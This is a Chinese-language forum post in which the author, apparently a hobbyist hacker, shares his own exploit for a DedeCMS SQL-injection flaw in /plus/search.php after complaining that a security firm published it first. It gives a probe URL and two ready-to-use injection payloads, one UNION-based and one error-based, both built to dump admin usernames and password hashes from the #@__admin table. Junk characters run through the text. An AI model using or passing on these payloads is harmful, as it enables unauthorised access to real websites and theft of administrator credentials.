转载不加作者名的没JJ
* F# g6 @7 M* u( E* y. @3 }- z1 q) ^0 u
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
, \5 E* p- m P8 f9 Q% F! ]+ p$ o6 ~
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
* u% S0 E9 G0 Z0 ]7 T* U
# n# }# s' K- [8 B" J6 N: v% g8 T我一般是这样测试的:
) U9 G% h- J: ~/ \5 A T8 t1 {; C- R+ {) X* R
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a1 q5 M- u, h+ {1 M1 o D- X
y9 S3 w* B* O j转载不加作者名的没JJ
9 R9 M; ]: m' @3 f- N. _
$ ~3 |$ D% D% q5 K1 @作者:鬼哥
( {- q) `2 A- ^( N: i
2 ?# m9 Q1 d8 M( {4 u
5 _9 s% ^3 ]4 g6 V" `( ]- D- I. n' E( Z1 I$ }. E
看结果如果提示
3 ?, r7 m; Q# O
; x2 o# D! \4 m5 nSafe Alert: Request Error step 2 !
) n! L" r2 Q# S) X7 I! q: B. V& s' Y6 `/ n2 ]
那么直接用下面的exp
# o2 k' S6 V1 V" Z
8 J: O* h8 t: |8 R+ J C" Jxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
: ]- o H/ z, R( N( W
6 E. O* Q* x' }, N
/ F! K: M- E& l+ b" z看结果如果提示
, P4 E* X* y# G3 y/ v8 p0 K" }* Y9 b6 A9 u
Safe Alert: Request Error step 1 !
+ ]+ u- `( K8 h+ S& N
9 L! P* z4 d4 ?9 v) C& Z那么直接用下面的exp$ `. P7 ]. v6 J, z
0 z, M" p. P( ~& N. A+ i1 Fxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a+ G: W7 \# F7 l* y q
/ `/ W& E4 w# p' h4 S7 A# M
) c. ^& H' x% C) |+ }: B# R如果正常显示证明漏洞不存在了。
. k2 [$ a$ O3 z' h1 @2 E2 g* R) e5 {8 s5 e5 W
转载不加作者名的没JJ |